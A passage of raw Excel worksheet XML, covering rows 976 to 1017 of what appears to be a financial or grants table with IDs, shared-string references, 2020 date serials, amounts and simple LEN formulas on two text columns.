      <c r="C976" t="s">
        <v>1159</v>
      </c>
      <c r="D976" t="s">
        <v>11179</v>
      </c>
      <c r="E976">
        <v>16</v>
      </c>
      <c r="F976" t="s">
        <v>10071</v>
      </c>
      <c r="G976" s="1">
        <v>44034</v>
      </c>
      <c r="H976">
        <v>6000</v>
      </c>
      <c r="J976" t="s">
        <v>10625</v>
      </c>
      <c r="K976">
        <f>LEN(I976)</f>
        <v>0</v>
      </c>
      <c r="L976">
        <f>LEN(J976)</f>
        <v>9</v>
      </c>
    </row>
    <row r="977" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A977">
        <v>21161</v>
      </c>
      <c r="B977">
        <v>541</v>
      </c>
      <c r="C977" t="s">
        <v>1159</v>
      </c>
      <c r="D977" t="s">
        <v>11179</v>
      </c>
      <c r="E977">
        <v>16</v>
      </c>
      <c r="F977" t="s">
        <v>10612</v>
      </c>
      <c r="G977" s="1">
        <v>44034</v>
      </c>
      <c r="H977">
        <v>3000</v>
      </c>
      <c r="J977" t="s">
        <v>10625</v>
      </c>
      <c r="K977">
        <f>LEN(I977)</f>
        <v>0</v>
      </c>
      <c r="L977">
        <f>LEN(J977)</f>
        <v>9</v>
      </c>
    </row>
    <row r="978" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A978">
        <v>21162</v>
      </c>
      <c r="B978">
        <v>541</v>
      </c>
      <c r="C978" t="s">
        <v>1159</v>
      </c>
      <c r="D978" t="s">
        <v>11179</v>
      </c>
      <c r="E978">
        <v>16</v>
      </c>
      <c r="F978" t="s">
        <v>10576</v>
      </c>
      <c r="G978" s="1">
        <v>44034</v>
      </c>
      <c r="H978">
        <v>2000</v>
      </c>
      <c r="J978" t="s">
        <v>10625</v>
      </c>
      <c r="K978">
        <f>LEN(I978)</f>
        <v>0</v>
      </c>
      <c r="L978">
        <f>LEN(J978)</f>
        <v>9</v>
      </c>
    </row>
    <row r="979" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A979">
        <v>21164</v>
      </c>
      <c r="B979">
        <v>541</v>
      </c>
      <c r="C979" t="s">
        <v>1159</v>
      </c>
      <c r="D979" t="s">
        <v>11179</v>
      </c>
      <c r="E979">
        <v>16</v>
      </c>
      <c r="F979" t="s">
        <v>9453</v>
      </c>
      <c r="G979" s="1">
        <v>44034</v>
      </c>
      <c r="H979">
        <v>60000</v>
      </c>
      <c r="J979" t="s">
        <v>10625</v>
      </c>
      <c r="K979">
        <f>LEN(I979)</f>
        <v>0</v>
      </c>
      <c r="L979">
        <f>LEN(J979)</f>
        <v>9</v>
      </c>
    </row>
    <row r="980" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A980">
        <v>21175</v>
      </c>
      <c r="B980">
        <v>743</v>
      </c>
      <c r="C980" t="s">
        <v>905</v>
      </c>
      <c r="D980" t="s">
        <v>11186</v>
      </c>
      <c r="E980">
        <v>16</v>
      </c>
      <c r="F980" t="s">
        <v>11188</v>
      </c>
      <c r="G980" s="1">
        <v>44159</v>
      </c>
      <c r="H980">
        <v>54000</v>
      </c>
      <c r="J980" t="s">
        <v>9501</v>
      </c>
      <c r="K980">
        <f>LEN(I980)</f>
        <v>0</v>
      </c>
      <c r="L980">
        <f>LEN(J980)</f>
        <v>9</v>
      </c>
    </row>
    <row r="981" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A981">
        <v>21315</v>
      </c>
      <c r="B981">
        <v>241</v>
      </c>
      <c r="C981" t="s">
        <v>1604</v>
      </c>
      <c r="D981" t="s">
        <v>11287</v>
      </c>
      <c r="E981">
        <v>16</v>
      </c>
      <c r="F981" t="s">
        <v>11300</v>
      </c>
      <c r="G981" s="1">
        <v>44061</v>
      </c>
      <c r="H981">
        <v>100</v>
      </c>
      <c r="J981" t="s">
        <v>9624</v>
      </c>
      <c r="K981">
        <f>LEN(I981)</f>
        <v>0</v>
      </c>
      <c r="L981">
        <f>LEN(J981)</f>
        <v>9</v>
      </c>
    </row>
    <row r="982" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A982">
        <v>21316</v>
      </c>
      <c r="B982">
        <v>241</v>
      </c>
      <c r="C982" t="s">
        <v>1604</v>
      </c>
      <c r="D982" t="s">
        <v>11287</v>
      </c>
      <c r="E982">
        <v>16</v>
      </c>
      <c r="F982" t="s">
        <v>9590</v>
      </c>
      <c r="G982" s="1">
        <v>44061</v>
      </c>
      <c r="H982">
        <v>100</v>
      </c>
      <c r="J982" t="s">
        <v>9624</v>
      </c>
      <c r="K982">
        <f>LEN(I982)</f>
        <v>0</v>
      </c>
      <c r="L982">
        <f>LEN(J982)</f>
        <v>9</v>
      </c>
    </row>
    <row r="983" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A983">
        <v>20529</v>
      </c>
      <c r="B983">
        <v>771</v>
      </c>
      <c r="C983" t="s">
        <v>1045</v>
      </c>
      <c r="D983" t="s">
        <v>10776</v>
      </c>
      <c r="E983">
        <v>11</v>
      </c>
      <c r="F983" t="s">
        <v>10777</v>
      </c>
      <c r="G983" s="1">
        <v>44011</v>
      </c>
      <c r="H983">
        <v>500000</v>
      </c>
      <c r="I983" t="s">
        <v>10778</v>
      </c>
      <c r="J983" t="s">
        <v>10779</v>
      </c>
      <c r="K983">
        <f>LEN(I983)</f>
        <v>168</v>
      </c>
      <c r="L983">
        <f>LEN(J983)</f>
        <v>8</v>
      </c>
    </row>
    <row r="984" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A984">
        <v>20844</v>
      </c>
      <c r="B984">
        <v>735</v>
      </c>
      <c r="C984" t="s">
        <v>1290</v>
      </c>
      <c r="D984" t="s">
        <v>11026</v>
      </c>
      <c r="E984">
        <v>2</v>
      </c>
      <c r="F984" t="s">
        <v>11028</v>
      </c>
      <c r="G984" s="1">
        <v>44071</v>
      </c>
      <c r="H984">
        <v>50000</v>
      </c>
      <c r="I984" t="s">
        <v>11029</v>
      </c>
      <c r="J984" t="s">
        <v>9427</v>
      </c>
      <c r="K984">
        <f>LEN(I984)</f>
        <v>42</v>
      </c>
      <c r="L984">
        <f>LEN(J984)</f>
        <v>8</v>
      </c>
    </row>
    <row r="985" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A985">
        <v>20845</v>
      </c>
      <c r="B985">
        <v>735</v>
      </c>
      <c r="C985" t="s">
        <v>1290</v>
      </c>
      <c r="D985" t="s">
        <v>11026</v>
      </c>
      <c r="E985">
        <v>2</v>
      </c>
      <c r="F985" t="s">
        <v>11030</v>
      </c>
      <c r="G985" s="1">
        <v>44071</v>
      </c>
      <c r="H985">
        <v>50000</v>
      </c>
      <c r="I985" t="s">
        <v>11029</v>
      </c>
      <c r="J985" t="s">
        <v>9427</v>
      </c>
      <c r="K985">
        <f>LEN(I985)</f>
        <v>42</v>
      </c>
      <c r="L985">
        <f>LEN(J985)</f>
        <v>8</v>
      </c>
    </row>
    <row r="986" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A986">
        <v>20431</v>
      </c>
      <c r="B986">
        <v>228</v>
      </c>
      <c r="C986" t="s">
        <v>1023</v>
      </c>
      <c r="D986" t="s">
        <v>10704</v>
      </c>
      <c r="E986">
        <v>16</v>
      </c>
      <c r="F986" t="s">
        <v>1455</v>
      </c>
      <c r="G986" s="1">
        <v>44081</v>
      </c>
      <c r="H986">
        <v>500000</v>
      </c>
      <c r="I986" t="s">
        <v>10705</v>
      </c>
      <c r="J986" t="s">
        <v>10706</v>
      </c>
      <c r="K986">
        <f>LEN(I986)</f>
        <v>35</v>
      </c>
      <c r="L986">
        <f>LEN(J986)</f>
        <v>8</v>
      </c>
    </row>
    <row r="987" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A987">
        <v>20314</v>
      </c>
      <c r="B987">
        <v>482</v>
      </c>
      <c r="C987" t="s">
        <v>863</v>
      </c>
      <c r="D987" t="s">
        <v>10620</v>
      </c>
      <c r="E987">
        <v>6</v>
      </c>
      <c r="F987" t="s">
        <v>9435</v>
      </c>
      <c r="G987" s="1">
        <v>43927</v>
      </c>
      <c r="H987">
        <v>64000</v>
      </c>
      <c r="I987" t="s">
        <v>9693</v>
      </c>
      <c r="J987" t="s">
        <v>9427</v>
      </c>
      <c r="K987">
        <f>LEN(I987)</f>
        <v>33</v>
      </c>
      <c r="L987">
        <f>LEN(J987)</f>
        <v>8</v>
      </c>
    </row>
    <row r="988" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A988">
        <v>16713</v>
      </c>
      <c r="B988">
        <v>1098</v>
      </c>
      <c r="C988" t="s">
        <v>3489</v>
      </c>
      <c r="D988" t="s">
        <v>9495</v>
      </c>
      <c r="E988">
        <v>14</v>
      </c>
      <c r="F988" t="s">
        <v>609</v>
      </c>
      <c r="G988" s="1">
        <v>43959</v>
      </c>
      <c r="H988">
        <v>40000</v>
      </c>
      <c r="I988" t="s">
        <v>9496</v>
      </c>
      <c r="J988" t="s">
        <v>9427</v>
      </c>
      <c r="K988">
        <f>LEN(I988)</f>
        <v>18</v>
      </c>
      <c r="L988">
        <f>LEN(J988)</f>
        <v>8</v>
      </c>
    </row>
    <row r="989" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A989">
        <v>20197</v>
      </c>
      <c r="B989">
        <v>237</v>
      </c>
      <c r="C989" t="s">
        <v>798</v>
      </c>
      <c r="D989" t="s">
        <v>10537</v>
      </c>
      <c r="E989">
        <v>16</v>
      </c>
      <c r="F989" t="s">
        <v>1746</v>
      </c>
      <c r="G989" s="1">
        <v>43921</v>
      </c>
      <c r="H989">
        <v>50000</v>
      </c>
      <c r="I989" t="s">
        <v>9738</v>
      </c>
      <c r="J989" t="s">
        <v>10330</v>
      </c>
      <c r="K989">
        <f>LEN(I989)</f>
        <v>18</v>
      </c>
      <c r="L989">
        <f>LEN(J989)</f>
        <v>8</v>
      </c>
    </row>
    <row r="990" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A990">
        <v>20317</v>
      </c>
      <c r="B990">
        <v>482</v>
      </c>
      <c r="C990" t="s">
        <v>863</v>
      </c>
      <c r="D990" t="s">
        <v>10620</v>
      </c>
      <c r="E990">
        <v>6</v>
      </c>
      <c r="F990" t="s">
        <v>9892</v>
      </c>
      <c r="G990" s="1">
        <v>43927</v>
      </c>
      <c r="H990">
        <v>30000</v>
      </c>
      <c r="I990" t="s">
        <v>9550</v>
      </c>
      <c r="J990" t="s">
        <v>9427</v>
      </c>
      <c r="K990">
        <f>LEN(I990)</f>
        <v>18</v>
      </c>
      <c r="L990">
        <f>LEN(J990)</f>
        <v>8</v>
      </c>
    </row>
    <row r="991" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A991">
        <v>21365</v>
      </c>
      <c r="B991">
        <v>427</v>
      </c>
      <c r="C991" t="s">
        <v>1619</v>
      </c>
      <c r="D991" t="s">
        <v>11325</v>
      </c>
      <c r="E991">
        <v>12</v>
      </c>
      <c r="F991" t="s">
        <v>9435</v>
      </c>
      <c r="G991" s="1">
        <v>44116</v>
      </c>
      <c r="H991">
        <v>10000</v>
      </c>
      <c r="I991" t="s">
        <v>9550</v>
      </c>
      <c r="J991" t="s">
        <v>9427</v>
      </c>
      <c r="K991">
        <f>LEN(I991)</f>
        <v>18</v>
      </c>
      <c r="L991">
        <f>LEN(J991)</f>
        <v>8</v>
      </c>
    </row>
    <row r="992" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A992">
        <v>20510</v>
      </c>
      <c r="B992">
        <v>2700</v>
      </c>
      <c r="C992" t="s">
        <v>5810</v>
      </c>
      <c r="D992" t="s">
        <v>10760</v>
      </c>
      <c r="E992">
        <v>18</v>
      </c>
      <c r="F992" t="s">
        <v>9217</v>
      </c>
      <c r="G992" s="1">
        <v>43930</v>
      </c>
      <c r="H992">
        <v>6000</v>
      </c>
      <c r="I992" t="s">
        <v>10761</v>
      </c>
      <c r="J992" t="s">
        <v>10330</v>
      </c>
      <c r="K992">
        <f>LEN(I992)</f>
        <v>17</v>
      </c>
      <c r="L992">
        <f>LEN(J992)</f>
        <v>8</v>
      </c>
    </row>
    <row r="993" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A993">
        <v>21118</v>
      </c>
      <c r="B993">
        <v>690</v>
      </c>
      <c r="C993" t="s">
        <v>1537</v>
      </c>
      <c r="D993" t="s">
        <v>11151</v>
      </c>
      <c r="E993">
        <v>20</v>
      </c>
      <c r="F993" t="s">
        <v>3814</v>
      </c>
      <c r="G993" s="1">
        <v>44022</v>
      </c>
      <c r="H993">
        <v>200000</v>
      </c>
      <c r="I993" t="s">
        <v>11152</v>
      </c>
      <c r="J993" t="s">
        <v>9427</v>
      </c>
      <c r="K993">
        <f>LEN(I993)</f>
        <v>14</v>
      </c>
      <c r="L993">
        <f>LEN(J993)</f>
        <v>8</v>
      </c>
    </row>
    <row r="994" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A994">
        <v>21119</v>
      </c>
      <c r="B994">
        <v>690</v>
      </c>
      <c r="C994" t="s">
        <v>1537</v>
      </c>
      <c r="D994" t="s">
        <v>11151</v>
      </c>
      <c r="E994">
        <v>20</v>
      </c>
      <c r="F994" t="s">
        <v>11153</v>
      </c>
      <c r="G994" s="1">
        <v>44022</v>
      </c>
      <c r="H994">
        <v>150000</v>
      </c>
      <c r="I994" t="s">
        <v>11152</v>
      </c>
      <c r="J994" t="s">
        <v>9427</v>
      </c>
      <c r="K994">
        <f>LEN(I994)</f>
        <v>14</v>
      </c>
      <c r="L994">
        <f>LEN(J994)</f>
        <v>8</v>
      </c>
    </row>
    <row r="995" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A995">
        <v>21120</v>
      </c>
      <c r="B995">
        <v>690</v>
      </c>
      <c r="C995" t="s">
        <v>1537</v>
      </c>
      <c r="D995" t="s">
        <v>11151</v>
      </c>
      <c r="E995">
        <v>20</v>
      </c>
      <c r="F995" t="s">
        <v>9590</v>
      </c>
      <c r="G995" s="1">
        <v>44022</v>
      </c>
      <c r="H995">
        <v>60000</v>
      </c>
      <c r="I995" t="s">
        <v>11152</v>
      </c>
      <c r="J995" t="s">
        <v>9427</v>
      </c>
      <c r="K995">
        <f>LEN(I995)</f>
        <v>14</v>
      </c>
      <c r="L995">
        <f>LEN(J995)</f>
        <v>8</v>
      </c>
    </row>
    <row r="996" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A996">
        <v>21121</v>
      </c>
      <c r="B996">
        <v>690</v>
      </c>
      <c r="C996" t="s">
        <v>1537</v>
      </c>
      <c r="D996" t="s">
        <v>11151</v>
      </c>
      <c r="E996">
        <v>20</v>
      </c>
      <c r="F996" t="s">
        <v>9676</v>
      </c>
      <c r="G996" s="1">
        <v>44022</v>
      </c>
      <c r="H996">
        <v>70000</v>
      </c>
      <c r="I996" t="s">
        <v>11152</v>
      </c>
      <c r="J996" t="s">
        <v>9427</v>
      </c>
      <c r="K996">
        <f>LEN(I996)</f>
        <v>14</v>
      </c>
      <c r="L996">
        <f>LEN(J996)</f>
        <v>8</v>
      </c>
    </row>
    <row r="997" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A997">
        <v>20846</v>
      </c>
      <c r="B997">
        <v>735</v>
      </c>
      <c r="C997" t="s">
        <v>1290</v>
      </c>
      <c r="D997" t="s">
        <v>11026</v>
      </c>
      <c r="E997">
        <v>2</v>
      </c>
      <c r="F997" t="s">
        <v>7057</v>
      </c>
      <c r="G997" s="1">
        <v>44071</v>
      </c>
      <c r="H997">
        <v>100000</v>
      </c>
      <c r="I997" t="s">
        <v>11031</v>
      </c>
      <c r="J997" t="s">
        <v>9427</v>
      </c>
      <c r="K997">
        <f>LEN(I997)</f>
        <v>12</v>
      </c>
      <c r="L997">
        <f>LEN(J997)</f>
        <v>8</v>
      </c>
    </row>
    <row r="998" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A998">
        <v>20289</v>
      </c>
      <c r="B998">
        <v>2581</v>
      </c>
      <c r="C998" t="s">
        <v>16344</v>
      </c>
      <c r="D998" t="s">
        <v>16345</v>
      </c>
      <c r="E998">
        <v>2</v>
      </c>
      <c r="F998" t="s">
        <v>10604</v>
      </c>
      <c r="G998" s="1">
        <v>44218</v>
      </c>
      <c r="H998" s="4">
        <v>25000</v>
      </c>
      <c r="I998" t="s">
        <v>9603</v>
      </c>
      <c r="J998" t="s">
        <v>9427</v>
      </c>
      <c r="K998">
        <f>LEN(I998)</f>
        <v>10</v>
      </c>
      <c r="L998">
        <f>LEN(J998)</f>
        <v>8</v>
      </c>
    </row>
    <row r="999" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A999">
        <v>16612</v>
      </c>
      <c r="B999">
        <v>2313</v>
      </c>
      <c r="C999" t="s">
        <v>6415</v>
      </c>
      <c r="D999" t="s">
        <v>9425</v>
      </c>
      <c r="E999">
        <v>4</v>
      </c>
      <c r="F999" t="s">
        <v>9426</v>
      </c>
      <c r="G999" s="1">
        <v>43861</v>
      </c>
      <c r="H999">
        <v>1440</v>
      </c>
      <c r="J999" t="s">
        <v>9427</v>
      </c>
      <c r="K999">
        <f>LEN(I999)</f>
        <v>0</v>
      </c>
      <c r="L999">
        <f>LEN(J999)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1000" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1000">
        <v>17375</v>
      </c>
      <c r="B1000">
        <v>1240</v>
      </c>
      <c r="C1000" t="s">
        <v>2554</v>
      </c>
      <c r="D1000" t="s">
        <v>9781</v>
      </c>
      <c r="E1000">
        <v>1</v>
      </c>
      <c r="F1000" t="s">
        <v>9782</v>
      </c>
      <c r="G1000" s="1">
        <v>43910</v>
      </c>
      <c r="H1000">
        <v>0</v>
      </c>
      <c r="J1000" t="s">
        <v>9427</v>
      </c>
      <c r="K1000">
        <f>LEN(I1000)</f>
        <v>0</v>
      </c>
      <c r="L1000">
        <f>LEN(J1000)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1001" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1001">
        <v>19819</v>
      </c>
      <c r="B1001">
        <v>2618</v>
      </c>
      <c r="C1001" t="s">
        <v>5402</v>
      </c>
      <c r="D1001" t="s">
        <v>10264</v>
      </c>
      <c r="E1001">
        <v>2</v>
      </c>
      <c r="F1001" t="s">
        <v>1746</v>
      </c>
      <c r="G1001" s="1">
        <v>43923</v>
      </c>
      <c r="H1001">
        <v>30000</v>
      </c>
      <c r="J1001" t="s">
        <v>9427</v>
      </c>
      <c r="K1001">
        <f>LEN(I1001)</f>
        <v>0</v>
      </c>
      <c r="L1001">
        <f>LEN(J1001)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1002" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1002">
        <v>19820</v>
      </c>
      <c r="B1002">
        <v>2618</v>
      </c>
      <c r="C1002" t="s">
        <v>5402</v>
      </c>
      <c r="D1002" t="s">
        <v>10264</v>
      </c>
      <c r="E1002">
        <v>2</v>
      </c>
      <c r="F1002" t="s">
        <v>9435</v>
      </c>
      <c r="G1002" s="1">
        <v>43923</v>
      </c>
      <c r="H1002">
        <v>30000</v>
      </c>
      <c r="J1002" t="s">
        <v>9427</v>
      </c>
      <c r="K1002">
        <f>LEN(I1002)</f>
        <v>0</v>
      </c>
      <c r="L1002">
        <f>LEN(J1002)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1003" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1003">
        <v>19821</v>
      </c>
      <c r="B1003">
        <v>2618</v>
      </c>
      <c r="C1003" t="s">
        <v>5402</v>
      </c>
      <c r="D1003" t="s">
        <v>10264</v>
      </c>
      <c r="E1003">
        <v>2</v>
      </c>
      <c r="F1003" t="s">
        <v>9437</v>
      </c>
      <c r="G1003" s="1">
        <v>43923</v>
      </c>
      <c r="H1003">
        <v>25000</v>
      </c>
      <c r="J1003" t="s">
        <v>9427</v>
      </c>
      <c r="K1003">
        <f>LEN(I1003)</f>
        <v>0</v>
      </c>
      <c r="L1003">
        <f>LEN(J1003)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1004" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1004">
        <v>19822</v>
      </c>
      <c r="B1004">
        <v>2618</v>
      </c>
      <c r="C1004" t="s">
        <v>5402</v>
      </c>
      <c r="D1004" t="s">
        <v>10264</v>
      </c>
      <c r="E1004">
        <v>2</v>
      </c>
      <c r="F1004" t="s">
        <v>9595</v>
      </c>
      <c r="G1004" s="1">
        <v>43923</v>
      </c>
      <c r="H1004">
        <v>20000</v>
      </c>
      <c r="J1004" t="s">
        <v>9427</v>
      </c>
      <c r="K1004">
        <f>LEN(I1004)</f>
        <v>0</v>
      </c>
      <c r="L1004">
        <f>LEN(J1004)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1005" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1005">
        <v>19917</v>
      </c>
      <c r="B1005">
        <v>1639</v>
      </c>
      <c r="C1005" t="s">
        <v>2812</v>
      </c>
      <c r="D1005" t="s">
        <v>10329</v>
      </c>
      <c r="E1005">
        <v>17</v>
      </c>
      <c r="F1005" t="s">
        <v>9561</v>
      </c>
      <c r="G1005" s="1">
        <v>43916</v>
      </c>
      <c r="H1005">
        <v>30000</v>
      </c>
      <c r="J1005" t="s">
        <v>10330</v>
      </c>
      <c r="K1005">
        <f>LEN(I1005)</f>
        <v>0</v>
      </c>
      <c r="L1005">
        <f>LEN(J1005)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1006" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1006">
        <v>20035</v>
      </c>
      <c r="B1006">
        <v>656</v>
      </c>
      <c r="C1006" t="s">
        <v>680</v>
      </c>
      <c r="D1006" t="s">
        <v>10418</v>
      </c>
      <c r="E1006">
        <v>2</v>
      </c>
      <c r="F1006" t="s">
        <v>10419</v>
      </c>
      <c r="G1006" s="1">
        <v>43966</v>
      </c>
      <c r="H1006">
        <v>50000</v>
      </c>
      <c r="J1006" t="s">
        <v>9427</v>
      </c>
      <c r="K1006">
        <f>LEN(I1006)</f>
        <v>0</v>
      </c>
      <c r="L1006">
        <f>LEN(J1006)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1007" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1007">
        <v>20036</v>
      </c>
      <c r="B1007">
        <v>656</v>
      </c>
      <c r="C1007" t="s">
        <v>680</v>
      </c>
      <c r="D1007" t="s">
        <v>10418</v>
      </c>
      <c r="E1007">
        <v>2</v>
      </c>
      <c r="F1007" t="s">
        <v>10420</v>
      </c>
      <c r="G1007" s="1">
        <v>43966</v>
      </c>
      <c r="H1007">
        <v>30000</v>
      </c>
      <c r="J1007" t="s">
        <v>9427</v>
      </c>
      <c r="K1007">
        <f>LEN(I1007)</f>
        <v>0</v>
      </c>
      <c r="L1007">
        <f>LEN(J1007)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1008" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1008">
        <v>20037</v>
      </c>
      <c r="B1008">
        <v>656</v>
      </c>
      <c r="C1008" t="s">
        <v>680</v>
      </c>
      <c r="D1008" t="s">
        <v>10418</v>
      </c>
      <c r="E1008">
        <v>2</v>
      </c>
      <c r="F1008" t="s">
        <v>10421</v>
      </c>
      <c r="G1008" s="1">
        <v>43966</v>
      </c>
      <c r="H1008">
        <v>40000</v>
      </c>
      <c r="J1008" t="s">
        <v>9427</v>
      </c>
      <c r="K1008">
        <f>LEN(I1008)</f>
        <v>0</v>
      </c>
      <c r="L1008">
        <f>LEN(J1008)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1009" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1009">
        <v>20038</v>
      </c>
      <c r="B1009">
        <v>656</v>
      </c>
      <c r="C1009" t="s">
        <v>680</v>
      </c>
      <c r="D1009" t="s">
        <v>10418</v>
      </c>
      <c r="E1009">
        <v>2</v>
      </c>
      <c r="F1009" t="s">
        <v>10422</v>
      </c>
      <c r="G1009" s="1">
        <v>43966</v>
      </c>
      <c r="H1009">
        <v>30000</v>
      </c>
      <c r="J1009" t="s">
        <v>9427</v>
      </c>
      <c r="K1009">
        <f>LEN(I1009)</f>
        <v>0</v>
      </c>
      <c r="L1009">
        <f>LEN(J1009)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1010" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1010">
        <v>20251</v>
      </c>
      <c r="B1010">
        <v>385</v>
      </c>
      <c r="C1010" t="s">
        <v>841</v>
      </c>
      <c r="D1010" t="s">
        <v>10579</v>
      </c>
      <c r="E1010">
        <v>14</v>
      </c>
      <c r="F1010" t="s">
        <v>9676</v>
      </c>
      <c r="G1010" s="1">
        <v>43991</v>
      </c>
      <c r="H1010">
        <v>500</v>
      </c>
      <c r="J1010" t="s">
        <v>9427</v>
      </c>
      <c r="K1010">
        <f>LEN(I1010)</f>
        <v>0</v>
      </c>
      <c r="L1010">
        <f>LEN(J1010)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1011" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1011">
        <v>20252</v>
      </c>
      <c r="B1011">
        <v>385</v>
      </c>
      <c r="C1011" t="s">
        <v>841</v>
      </c>
      <c r="D1011" t="s">
        <v>10579</v>
      </c>
      <c r="E1011">
        <v>14</v>
      </c>
      <c r="F1011" t="s">
        <v>3814</v>
      </c>
      <c r="G1011" s="1">
        <v>43991</v>
      </c>
      <c r="H1011">
        <v>500</v>
      </c>
      <c r="J1011" t="s">
        <v>9427</v>
      </c>
      <c r="K1011">
        <f>LEN(I1011)</f>
        <v>0</v>
      </c>
      <c r="L1011">
        <f>LEN(J1011)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1012" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1012">
        <v>20583</v>
      </c>
      <c r="B1012">
        <v>1000</v>
      </c>
      <c r="C1012" t="s">
        <v>3012</v>
      </c>
      <c r="D1012" t="s">
        <v>10831</v>
      </c>
      <c r="E1012">
        <v>4</v>
      </c>
      <c r="F1012" t="s">
        <v>3814</v>
      </c>
      <c r="G1012" s="1">
        <v>44055</v>
      </c>
      <c r="H1012">
        <v>96000</v>
      </c>
      <c r="J1012" t="s">
        <v>9427</v>
      </c>
      <c r="K1012">
        <f>LEN(I1012)</f>
        <v>0</v>
      </c>
      <c r="L1012">
        <f>LEN(J1012)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1013" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1013">
        <v>20584</v>
      </c>
      <c r="B1013">
        <v>1000</v>
      </c>
      <c r="C1013" t="s">
        <v>3012</v>
      </c>
      <c r="D1013" t="s">
        <v>10831</v>
      </c>
      <c r="E1013">
        <v>4</v>
      </c>
      <c r="F1013" t="s">
        <v>5434</v>
      </c>
      <c r="G1013" s="1">
        <v>44055</v>
      </c>
      <c r="H1013">
        <v>2400</v>
      </c>
      <c r="J1013" t="s">
        <v>9427</v>
      </c>
      <c r="K1013">
        <f>LEN(I1013)</f>
        <v>0</v>
      </c>
      <c r="L1013">
        <f>LEN(J1013)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1014" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1014">
        <v>20585</v>
      </c>
      <c r="B1014">
        <v>1000</v>
      </c>
      <c r="C1014" t="s">
        <v>3012</v>
      </c>
      <c r="D1014" t="s">
        <v>10831</v>
      </c>
      <c r="E1014">
        <v>4</v>
      </c>
      <c r="F1014" t="s">
        <v>9577</v>
      </c>
      <c r="G1014" s="1">
        <v>44055</v>
      </c>
      <c r="H1014">
        <v>35000</v>
      </c>
      <c r="J1014" t="s">
        <v>9427</v>
      </c>
      <c r="K1014">
        <f>LEN(I1014)</f>
        <v>0</v>
      </c>
      <c r="L1014">
        <f>LEN(J1014)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1015" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1015">
        <v>20586</v>
      </c>
      <c r="B1015">
        <v>1000</v>
      </c>
      <c r="C1015" t="s">
        <v>3012</v>
      </c>
      <c r="D1015" t="s">
        <v>10831</v>
      </c>
      <c r="E1015">
        <v>4</v>
      </c>
      <c r="F1015" t="s">
        <v>10832</v>
      </c>
      <c r="G1015" s="1">
        <v>44055</v>
      </c>
      <c r="H1015">
        <v>2000</v>
      </c>
      <c r="J1015" t="s">
        <v>9427</v>
      </c>
      <c r="K1015">
        <f>LEN(I1015)</f>
        <v>0</v>
      </c>
      <c r="L1015">
        <f>LEN(J1015)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1016" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1016">
        <v>20587</v>
      </c>
      <c r="B1016">
        <v>1000</v>
      </c>
      <c r="C1016" t="s">
        <v>3012</v>
      </c>
      <c r="D1016" t="s">
        <v>10831</v>
      </c>
      <c r="E1016">
        <v>4</v>
      </c>
      <c r="F1016" t="s">
        <v>10833</v>
      </c>
      <c r="G1016" s="1">
        <v>44055</v>
      </c>
      <c r="H1016">
        <v>1800</v>
      </c>
      <c r="J1016" t="s">
        <v>9427</v>
      </c>
      <c r="K1016">
        <f>LEN(I1016)</f>
        <v>0</v>
      </c>
      <c r="L1016">
        <f>LEN(J1016)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1017" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1017">
        <v>20588</v>
      </c>
      <c r="B1017">
        <v>1000</v>
      </c>
      <c r="C1017" t="s">
        <v>3012</v>
      </c>
      <c r="D1017" t="s">
        <v>10831</v>
      </c>
      <c r="E1017">
        <v>4</v>
      </c>
      <c r="F1017" t="s">
        <v>764</v>
      </c>
      <c r="G1017" s="1">
        <v>44055</v>
      </c>
      <c r="H1017">
        <v>14400</v>
